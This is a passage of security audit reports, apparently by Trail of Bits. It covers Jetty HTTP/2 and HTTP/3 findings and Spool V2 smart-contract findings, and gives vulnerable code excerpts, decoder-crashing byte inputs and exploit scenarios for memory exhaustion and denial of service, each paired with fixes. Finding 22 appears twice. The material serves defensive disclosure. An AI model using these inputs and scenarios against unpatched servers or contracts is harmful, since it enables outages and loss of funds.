keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( "java.io.tmpdir" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154–179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library’s API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server’s temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library’s API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server’s filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue. 72 OSTIF Eclipse: Jetty Security Assessment 22. Repeated code between HPACK and QPACK Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22 Target: ● org.eclipse.jetty.http2.hpack.internal.NBitInteger ● org.eclipse.jetty.http2.hpack.internal.Huffman ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder Description Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment 23. 
22. Repeated code between HPACK and QPACK
Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22
Target:
● org.eclipse.jetty.http2.hpack.internal.NBitInteger
● org.eclipse.jetty.http2.hpack.internal.Huffman
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder

Description
Classes for dealing with n-bit integers and Huffman coding are implemented in both the jetty-http2-hpack and jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases (TOB-JETTY-9), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged.

Exploit Scenario
A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable.

Recommendations
Short term, merge the two implementations of the n-bit integer and Huffman coding classes.

Long term, audit the Jetty codebase for other classes with very similar functionality.

23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode
Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23
Target: org.eclipse.jetty.http2.hpack.HpackDecoder, org.eclipse.jetty.http3.qpack.QpackDecoder

Description
The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions:
● HpackDecoder.decode(0x03) throws BufferUnderflowException.
● HpackDecoder.decode(0x4800) throws NumberFormatException.
● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException.
● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException.
● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException.
● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException.
● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException.

For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code.

Exploit Scenario
Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability.

Recommendations
Short term, document in the code that Java-level exceptions can be thrown.

Long term, modify the decode functions so that they throw only Jetty-level exceptions.
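A minimal sketch of the long-term recommendation follows. The JettyDecodeException type and the decodeInternal helper are hypothetical names used for illustration; Jetty's actual exception hierarchy may differ.

    import java.nio.ByteBuffer;

    // Hypothetical Jetty-level exception that callers of decode() can rely on.
    class JettyDecodeException extends Exception {
        JettyDecodeException(String message, Throwable cause) { super(message, cause); }
    }

    class Decoder {
        // Sketch: confine Java-level runtime exceptions to the decoder itself
        // and surface a single, documented exception type to callers.
        public Object decode(ByteBuffer buffer) throws JettyDecodeException {
            try {
                return decodeInternal(buffer); // existing decoding logic would live here
            } catch (RuntimeException e) {
                // BufferUnderflowException, NumberFormatException,
                // ArrayIndexOutOfBoundsException, etc. all land here.
                throw new JettyDecodeException("malformed HPACK/QPACK input", e);
            }
        }

        private Object decodeInternal(ByteBuffer buffer) {
            throw new UnsupportedOperationException("placeholder for real decoding logic");
        }
    }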
24. Incorrect QPACK encoding when multi-byte characters are used
Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-24
Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry

Description
Java's string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, the QPACK encoding methods assume that they return the same number, which could cause incorrect encodings.

In EncodableEntry.LiteralEntry, which is used to encode HTTP/3 header fields, the following method is used for encoding:

    214    public void encode(ByteBuffer buffer, int base)
    215    {
    216        byte allowIntermediary = 0x00; // TODO: this is 0x10 bit, when should this be set?
    217        String name = getName();
    218        String value = getValue();
    219
    220        // Encode the prefix code and the name.
    221        if (_huffman)
    222        {
    223            buffer.put((byte)(0x28 | allowIntermediary));
    224            NBitIntegerEncoder.encode(buffer, 3, HuffmanEncoder.octetsNeeded(name));
    225            HuffmanEncoder.encode(buffer, name);
    226            buffer.put((byte)0x80);
    227            NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
    228            HuffmanEncoder.encode(buffer, value);
    229        }
    230        else
    231        {
    232            // TODO: What charset should we be using? (this applies to the instruction generators as well).
    233            buffer.put((byte)(0x20 | allowIntermediary));
    234            NBitIntegerEncoder.encode(buffer, 3, name.length());
    235            buffer.put(name.getBytes());
    236            buffer.put((byte)0x00);
    237            NBitIntegerEncoder.encode(buffer, 7, value.length());
    238            buffer.put(value.getBytes());
    239        }
    240    }

Figure 24.1: EncodableEntry.java, lines 214–240

Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes(). Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes(). When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field.

The same issue appears in EncodableEntry.ReferencedNameEntry.encode:

    164        // Encode the value.
    165        String value = getValue();
    166        if (_huffman)
    167        {
    168            buffer.put((byte)0x80);
    169            NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
    170            HuffmanEncoder.encode(buffer, value);
    171        }
    172        else
    173        {
    174            buffer.put((byte)0x00);
    175            NBitIntegerEncoder.encode(buffer, 7, value.length());
    176            buffer.put(value.getBytes());
    177        }

Figure 24.2: EncodableEntry.java, lines 164–177

If value has multibyte characters, it will be incorrectly encoded in lines 174–176.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Exploit Scenario
A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly.

Recommendations
Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length().
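The mismatch described above is easy to reproduce in isolation. The standalone snippet below (not Jetty code) shows a two-character string whose UTF-8 encoding occupies five bytes, which is exactly the discrepancy between the advertised length and the emitted bytes in figures 24.1 and 24.2.

    import java.nio.charset.StandardCharsets;

    public final class LengthMismatchDemo {
        public static void main(String[] args) {
            String value = "é€"; // two characters, multiple bytes each in UTF-8

            // length() counts characters (UTF-16 code units); getBytes() counts bytes.
            System.out.println(value.length());                                // 2
            System.out.println(value.getBytes(StandardCharsets.UTF_8).length); // 5

            // A QPACK decoder told to read value.length() bytes would read only
            // 2 of the 5 bytes and then misparse everything that follows.
        }
    }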
25. No limits on maximum capacity in QPACK decoder
Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25
Target:
● org.eclipse.jetty.http3.qpack.QpackDecoder
● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructionParser
● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable

Description
In QPACK, an encoder can set the dynamic table capacity of the decoder using a "Set Dynamic Table Capacity" instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, this limit is not checked anywhere in the QPACK code. This means that the encoder can choose whatever capacity it wants (up to Java's maximum integer value), allowing it to take up large amounts of space in the decoder's memory.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Exploit Scenario
A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a "Set Dynamic Table Capacity" instruction, setting the dynamic table capacity to Java's maximum integer value, 2^31 − 1 (approximately 2.1 GB). He then repeatedly enters very large values into the server's dynamic table using an "Insert with Literal Name" instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes.

Recommendations
Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity.

Long term, audit Jetty's implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards.
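A sketch of the short-term check appears below; the field and method names are illustrative assumptions rather than Jetty's actual identifiers, but the rule they enforce comes from RFC 9204, which requires a connection error when the encoder exceeds the decoder's advertised maximum.

    // Hypothetical illustration of enforcing the negotiated limit when the
    // peer's "Set Dynamic Table Capacity" instruction is parsed.
    class DynamicTableCapacityCheck {
        private final long maxTableCapacity; // SETTINGS_QPACK_MAX_TABLE_CAPACITY chosen by the decoder

        DynamicTableCapacityCheck(long maxTableCapacity) {
            this.maxTableCapacity = maxTableCapacity;
        }

        void onSetDynamicTableCapacity(long requestedCapacity) {
            if (requestedCapacity > maxTableCapacity) {
                throw new IllegalStateException(
                    "QPACK_ENCODER_STREAM_ERROR: capacity " + requestedCapacity
                        + " exceeds advertised maximum " + maxTableCapacity);
            }
            // ... resize the dynamic table ...
        }
    }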
diff --git a/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt b/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt
new file mode 100644
index 0000000..0b0b1c9
--- /dev/null
+++ b/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt
@@ -0,0 +1,37 @@

1. Solidity compiler optimizations can be problematic
Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-1
Target: foundry.toml

Description
Spool V2 has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised.

High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the Emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations.

Exploit Scenario
A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Spool V2 contracts.

Recommendations
Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug.

Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.

2. Risk of SmartVaultFactory DoS due to lack of access controls on grantSmartVaultOwnership
Severity: High Difficulty: Low Type: Access Controls Finding ID: TOB-SPL-2
Target: SmartVaultFactory.sol, access/SpoolAccessControl.sol

Description
Anyone can set the owner of the next smart vault to be created, which will result in a DoS of the SmartVaultFactory contract. The grantSmartVaultOwnership function in the SpoolAccessControl contract allows anyone to set the owner of a smart vault. This function reverts if an owner is already set for the provided smart vault.

    function grantSmartVaultOwnership(address smartVault, address owner) external {
        if (smartVaultOwner[smartVault] != address(0)) {
            revert SmartVaultOwnerAlreadySet(smartVault);
        }
        smartVaultOwner[smartVault] = owner;
    }

Figure 2.1: The grantSmartVaultOwnership function in SpoolAccessControl.sol

The SmartVaultFactory contract implements two functions for deploying new smart vaults: the deploySmartVault function uses the create opcode, and the deploySmartVaultDeterministically function uses the create2 opcode. Both functions create a new smart vault and call the grantSmartVaultOwnership function to make the message sender the owner of the newly created smart vault.

Any user can pre-compute the address of the new smart vault for a deploySmartVault transaction by using the address and nonce of the SmartVaultFactory contract; to compute the address of the new smart vault for a deploySmartVaultDeterministically transaction, the user could front-run the transaction to capture the salt provided by the user who submitted it.

Exploit Scenario
Eve pre-computes the address of the new smart vault that will be created by the deploySmartVault function in the SmartVaultFactory contract. She then calls the grantSmartVaultOwnership function with the pre-computed address and a nonzero address as arguments. Now, every call to the deploySmartVault function reverts, making the SmartVaultFactory contract unusable. Using a similar strategy, Eve blocks the deploySmartVaultDeterministically function by front-running the user transaction to set the owner of the smart vault address computed using the user-provided salt.

Recommendations
Short term, add the onlyRole(ROLE_SMART_VAULT_INTEGRATOR, msg.sender) modifier to the grantSmartVaultOwnership function to restrict access to it.

Long term, follow the principle of least privilege by restricting access to the functions that grant specific privileges to actors of the system.
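A minimal sketch of the short-term fix, assuming the onlyRole modifier and ROLE_SMART_VAULT_INTEGRATOR constant behave as they do elsewhere in the codebase:

    // Sketch: only the smart vault integrator role may assign ownership, so an
    // attacker can no longer pre-claim a vault address before it is deployed.
    function grantSmartVaultOwnership(address smartVault, address owner)
        external
        onlyRole(ROLE_SMART_VAULT_INTEGRATOR, msg.sender)
    {
        if (smartVaultOwner[smartVault] != address(0)) {
            revert SmartVaultOwnerAlreadySet(smartVault);
        }
        smartVaultOwner[smartVault] = owner;
    }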
3. Lack of zero-value check on constructors and initializers
Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-3
Target: Several contracts

Description
Several contracts' constructors and initialization functions fail to validate incoming arguments. As a result, important state variables could be set to the zero address, which would result in the loss of assets.

    constructor(
        ISpoolAccessControl accessControl_,
        IAssetGroupRegistry assetGroupRegistry_,
        IRiskManager riskManager_,
        IDepositManager depositManager_,
        IWithdrawalManager withdrawalManager_,
        IStrategyRegistry strategyRegistry_,
        IMasterWallet masterWallet_,
        IUsdPriceFeedManager priceFeedManager_,
        address ghostStrategy
    ) SpoolAccessControllable(accessControl_) {
        _assetGroupRegistry = assetGroupRegistry_;
        _riskManager = riskManager_;
        _depositManager = depositManager_;
        _withdrawalManager = withdrawalManager_;
        _strategyRegistry = strategyRegistry_;
        _masterWallet = masterWallet_;
        _priceFeedManager = priceFeedManager_;
        _ghostStrategy = ghostStrategy;
    }

Figure 3.1: The SmartVaultManager contract's constructor function in spool-v2-core/SmartVaultManager.sol#L111–L130

These constructors include that of the SmartVaultManager contract, which sets the _masterWallet address (figure 3.1). The SmartVaultManager contract is the entry point of the system and is used by users to deposit their tokens. User deposits are transferred to the _masterWallet address (figure 3.2).

    function _depositAssets(DepositBag calldata bag) internal returns (uint256) {
        [...]
        for (uint256 i; i < deposits.length; ++i) {
            IERC20(tokens[i]).safeTransferFrom(msg.sender, address(_masterWallet), deposits[i]);
        }
        [...]
    }

Figure 3.2: The _depositAssets function in spool-v2-core/SmartVaultManager.sol#L649–L676

If _masterWallet is set to the zero address, the tokens will be transferred to the zero address and will be lost permanently.

The constructors and initialization functions of the following contracts also fail to validate incoming arguments:
● StrategyRegistry
● DepositSwap
● SmartVault
● SmartVaultFactory
● SpoolAccessControllable
● DepositManager
● RiskManager
● SmartVaultManager
● WithdrawalManager
● RewardManager
● RewardPool
● Strategy

Exploit Scenario
Bob deploys the Spool system. During deployment, Bob accidentally sets the _masterWallet parameter of the SmartVaultManager contract to the zero address. Alice, excited about the new protocol, deposits 1 million WETH into it. Her deposited WETH tokens are transferred to the zero address, and Alice loses 1 million WETH.

Recommendations
Short term, add zero-value checks on all constructor arguments to ensure that the deployer cannot accidentally set incorrect values.

Long term, use Slither, which will catch functions that do not have zero-value checks.
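A minimal sketch of the recommended validation, shown for the _masterWallet dependency; the ZeroAddress error name is illustrative:

    error ZeroAddress();

    constructor(
        IMasterWallet masterWallet_ // ... other dependencies elided ...
    ) {
        // Reject zero addresses up front so a misconfigured deployment fails
        // loudly instead of silently sending user funds to the zero address.
        if (address(masterWallet_) == address(0)) revert ZeroAddress();
        _masterWallet = masterWallet_;
    }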
4. Upgradeable contracts set state variables in the constructor
Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-4
Target: managers/RewardManager.sol, managers/RewardPool.sol, strategies/Strategy.sol

Description
The state variables set in the constructor of the RewardManager implementation contract are not visible in the proxy contract, making the RewardManager contract unusable. The same issue exists in the RewardPool and Strategy smart contracts.

Upgradeable smart contracts using the delegatecall proxy pattern should implement an initializer function to set state variables in the proxy contract storage. The constructor function can be used to set immutable variables in the implementation contract because these variables do not consume storage slots and their values are inlined in the deployed code.

The RewardManager contract is deployed as an upgradeable smart contract, but it sets the state variable _assetGroupRegistry in the constructor function.

    contract RewardManager is IRewardManager, RewardPool, ReentrancyGuard {
        ...
        /* ========== STATE VARIABLES ========== */

        /// @notice Asset group registry
        IAssetGroupRegistry private _assetGroupRegistry;
        ...
        constructor(
            ISpoolAccessControl spoolAccessControl,
            IAssetGroupRegistry assetGroupRegistry_,
            bool allowPoolRootUpdates
        ) RewardPool(spoolAccessControl, allowPoolRootUpdates) {
            _assetGroupRegistry = assetGroupRegistry_;
        }

Figure 4.1: The constructor function in spool-v2-core/RewardManager.sol

The value of the _assetGroupRegistry variable will not be visible in the proxy contract, and the admin will not be able to add reward tokens to smart vaults, making the RewardManager contract unusable.

The following smart contracts are also affected by the same issue:
1. The ReentrancyGuard contract, which is non-upgradeable and is extended by RewardManager
2. The RewardPool contract, which sets the state variable allowUpdates in the constructor
3. The Strategy contract, which sets the state variable StrategyName in the constructor

Exploit Scenario
Bob creates a smart vault and wants to add a reward token to it. He calls the addToken function on the RewardManager contract, but the transaction unexpectedly reverts.

Recommendations
Short term, make the following changes (see the sketch after this list):
1. Make _assetGroupRegistry an immutable variable in the RewardManager contract.
2. Extend the ReentrancyGuardUpgradeable contract in the RewardManager contract.
3. Make allowUpdates an immutable variable in the RewardPool contract.
4. Move the statement _strategyName = strategyName_; from the Strategy contract's constructor to the contract's __Strategy_init function.
5. Review all of the upgradeable contracts to ensure that they extend only upgradeable library contracts and that the inherited contracts have a __gap storage variable to prevent storage collision issues with future upgrades.

Long term, review all of the upgradeable contracts to ensure that they use the initializer function instead of the constructor function to set state variables. Use slither-check-upgradeability to find issues related to upgradeable smart contracts.
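A minimal sketch of the two safe patterns, assuming OpenZeppelin-style upgradeable contracts (the Initializable base and its onlyInitializing modifier); contract names here are illustrative:

    contract RewardManagerFixed {
        // Pattern 1: immutable variables are embedded in the implementation's
        // bytecode, so setting them in the constructor is proxy-safe.
        IAssetGroupRegistry private immutable _assetGroupRegistry;

        constructor(IAssetGroupRegistry assetGroupRegistry_) {
            _assetGroupRegistry = assetGroupRegistry_;
        }
    }

    contract StrategyFixed is Initializable {
        // Pattern 2: ordinary storage variables must be set in an initializer,
        // which runs in the proxy's storage context.
        string private _strategyName;

        function __Strategy_init(string memory strategyName_) internal onlyInitializing {
            _strategyName = strategyName_;
        }
    }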
5. Insufficient validation of oracle price data
Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-5
Target: managers/UsdPriceFeedManager.sol

Description
The current validation of the values returned by Chainlink's latestRoundData function could result in the use of stale data. The latestRoundData function returns the following values: the answer, the roundId (which represents the current round), the answeredInRound value (which corresponds to the round in which the answer was computed), and the updatedAt value (which is the timestamp of when the round was updated). An updatedAt value of 0 means that the round is not complete and should not be used. An answeredInRound value that is less than the roundId indicates stale data. However, the _getAssetPriceInUsd function in the UsdPriceFeedManager contract does not check for these conditions.

    function _getAssetPriceInUsd(address asset) private view returns (uint256 assetPrice) {
        (
            /* uint80 roundId */,
            int256 answer,
            /* uint256 startedAt */,
            /* uint256 updatedAt */,
            /* uint80 answeredInRound */
        ) = assetPriceAggregator[asset].latestRoundData();

        if (answer < 1) {
            revert NonPositivePrice({price: answer});
        }

        return uint256(answer);
    }

Figure 5.1: The _getAssetPriceInUsd function in spool-v2-core/UsdPriceFeedManager.sol#L99–L116

Exploit Scenario
The price of an asset changes, but the Chainlink price feed is not updated correctly. The system uses the stale price data, and as a result, the asset is not correctly distributed in the strategies.

Recommendations
Short term, have _getAssetPriceInUsd perform the following sanity check: require(updatedAt != 0 && answeredInRound == roundId). This check will ensure that the round has finished and that the pricing data is from the current round.

Long term, when integrating with third-party protocols, make sure to accurately read their documentation and implement the appropriate sanity checks.
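A sketch of _getAssetPriceInUsd with the recommended check added; only the destructuring of the extra return values and the final require are new relative to figure 5.1:

    function _getAssetPriceInUsd(address asset) private view returns (uint256 assetPrice) {
        (uint80 roundId, int256 answer,, uint256 updatedAt, uint80 answeredInRound) =
            assetPriceAggregator[asset].latestRoundData();

        if (answer < 1) {
            revert NonPositivePrice({price: answer});
        }
        // Reject incomplete rounds (updatedAt == 0) and stale answers
        // (answeredInRound < roundId), per the short-term recommendation.
        require(updatedAt != 0 && answeredInRound == roundId, "stale price data");

        return uint256(answer);
    }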
6. Incorrect handling of fromVaultsOnly in removeStrategy
Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-6
Target: managers/SmartVaultManager.sol

Description
The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false; however, the implementation enforces the opposite, as shown in figure 6.1.

    function removeStrategy(address strategy, bool fromVaultsOnly) external {
        _checkRole(ROLE_SPOOL_ADMIN, msg.sender);
        _checkRole(ROLE_STRATEGY, strategy);
        ...
        if (fromVaultsOnly) {
            _strategyRegistry.removeStrategy(strategy);
        }
    }

Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298–L317

Exploit Scenario
Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true, believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed.

Recommendations
Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior.

Long term, improve the system's unit and integration tests to catch issues such as this one.

7. Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero
Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-7
Target: providers/LinearAllocationProvider.sol, providers/ExponentialAllocationProvider.sol

Description
The LinearAllocationProvider and ExponentialAllocationProvider contracts' calculateAllocation function can revert due to a division-by-zero error: LinearAllocationProvider's function reverts when the sum of the strategies' APY values is 0, and ExponentialAllocationProvider's function reverts when a single strategy has an APY value of 0.

Figure 7.1 shows a snippet of the LinearAllocationProvider contract's calculateAllocation function; if the apySum variable, which is the sum of all the strategies' APY values, is 0, a division-by-zero error will occur.

    uint8[] memory arrayRiskScores = data.riskScores;
    for (uint8 i; i < data.apys.length; ++i) {
        apySum += (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
        riskSum += arrayRiskScores[i];
    }
    uint8 riskt = uint8(data.riskTolerance + 10); // from 0 to 20
    for (uint8 i; i < data.apys.length; ++i) {
        uint256 apy = data.apys[i] > 0 ? uint256(data.apys[i]) : 0;
        apy = (apy * FULL_PERCENT) / apySum;

Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39–L49

Figure 7.2 shows that for the ExponentialAllocationProvider contract's calculateAllocation function, if the call to log_2 occurs with partApy set to 0, the function will revert because of log_2's require statement shown in figure 7.3.

    for (uint8 i; i < data.apys.length; ++i) {
        uint256 uintApy = (data.apys[i] > 0 ? uint256(data.apys[i]) : 0);
        int256 partRiskTolerance = fromUint(uint256(riskArray[uint8(20 - riskt)]));
        partRiskTolerance = div(partRiskTolerance, _100);
        int256 partApy = fromUint(uintApy);
        partApy = div(partApy, _100);
        int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy)));

Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323–L331

    function log_2(int256 x) internal pure returns (int256) {
        unchecked {
            require(x > 0);

Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32–L34

Exploit Scenario
Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert.

Recommendations
Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategy's APY is 0.

Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.
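One possible shape of the short-term fix in LinearAllocationProvider is sketched below; falling back to an equal-weight allocation when apySum is 0 is an illustrative policy choice, not necessarily the behavior the Spool team would want, and the allocations output array is assumed:

    // Sketch: avoid the division by zero when no strategy reports a positive
    // APY. Equal weighting is one of several reasonable fallback policies.
    if (apySum == 0) {
        uint256 equalShare = FULL_PERCENT / data.apys.length;
        for (uint8 i; i < data.apys.length; ++i) {
            allocations[i] = equalShare; // assumes an `allocations` output array
        }
        return allocations;
    }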
8. Strategy APYs are never updated
Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-8
Target: managers/StrategyRegistry.sol

Description
The _updateDhwYieldAndApy function is never called. As a result, each strategy's APY will constantly be set to 0.

    function _updateDhwYieldAndApy(address strategy, uint256 dhwIndex, int256 yieldPercentage) internal {
        if (dhwIndex > 1) {
            unchecked {
                int256 timeDelta = int256(block.timestamp - _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp);
                if (timeDelta > 0) {
                    int256 normalizedApy = yieldPercentage * SECONDS_IN_YEAR_INT / timeDelta;
                    int256 weight = _getRunningAverageApyWeight(timeDelta);
                    _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT;
                }
            }
        }
    }

Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298–L317

A strategy's APY is one of the parameters used by an allocator provider to decide where to allocate the assets of a smart vault. If a strategy's APY is 0, the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error.

    // set allocation
    if (uint16a16.unwrap(allocations) == 0) {
        _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider);
        _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance);
        _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider);
        allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies);
    }

Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313–L320

When a vault is created, the code in figure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0, which means the value will be calculated by the smart contract, and whose allocationProvider variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies' APYs to be set to 0, in turn causing the same division-by-zero error.

Refer to finding TOB-SPL-7, which is related to this issue; even if that finding is fixed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls.

Exploit Scenario
Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvider set to LinearAllocationProvider. The transaction unexpectedly fails.

Recommendations
Short term, add calls to _updateDhwYieldAndApy where appropriate.

Long term, improve the system's unit and integration tests to ensure that the basic operations work as expected.
9. Incorrect bookkeeping of assets deposited into smart vaults
Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-9
Target: managers/DepositManager.sol

Description
Assets deposited by users into smart vaults are incorrectly tracked. As a result, assets deposited into a smart vault's strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies.

